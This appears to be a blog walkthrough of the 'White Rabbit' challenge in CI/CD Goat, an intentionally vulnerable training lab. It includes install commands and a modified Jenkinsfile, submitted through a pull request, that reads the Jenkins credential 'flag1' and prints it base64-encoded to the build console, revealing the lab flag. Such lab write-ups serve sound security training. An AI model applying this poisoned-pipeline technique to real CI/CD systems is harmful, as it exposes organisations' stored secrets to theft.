In today’s fast-paced development environment, understanding and securing Continuous Integration and Continuous Delivery (CI/CD) pipelines is crucial. The blog post focuses on “CI/CD Goat,” a learning and training tool hosted on GitHub, designed specifically for this purpose. It offers a hands-on approach to understanding common security vulnerabilities in CI/CD pipelines and strategies to mitigate them. This tool stands out as an invaluable resource for developers, security professionals, and DevOps teams aiming to bolster their CI/CD security practices. Through practical examples and interactive exercises, “CI/CD Goat” provides a comprehensive learning experience in navigating and securing complex CI/CD environments.
Explore more about CI/CD Goat here https://github.com/cider-security-research/cicd-goat?tab=readme-ov-file.
Installation
curl -o cicd-goat/docker-compose.yaml --create-dirs https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
cd cicd-goat && docker-compose up -d
Let’s start exploring challenges-
White Rabbit
We already know the secret name “flag1” stored in the Jenkins credential store.
Therefore we can try to add code in Jenkinsfile to read this secret.
- Creating a new branch.
2. Modifying JenkinsFile to read the secret “flag1”.
pipeline {
agent any
environment {
PROJECT = "src/urllib3"
// Binding the secret text 'flag1' to an environment variable
SECRET_TEXT = credentials('flag1')
}
stages {
stage('Example') {
steps {
script {
sh '''
echo ${SECRET_TEXT} | base64
'''
}
}
}
stage ('Install_Requirements') {
steps {
sh """
virtualenv venv
pip3 install -r requirements.txt || true
"""
}
}
stage ('Lint') {
steps {
sh "pylint ${PROJECT} || true"
}
}
stage ('Unit Tests') {
steps {
sh "pytest"
}
}
}
post {
always {
cleanWs()
}
}
}
3. Push the changes to remote repo.
4. Creating a pull request.
5. We got the base64 encoded secret in the console.
06165DF2-C047-4402-8CAB-1C8EC526C115
Thanks for reading!
References:
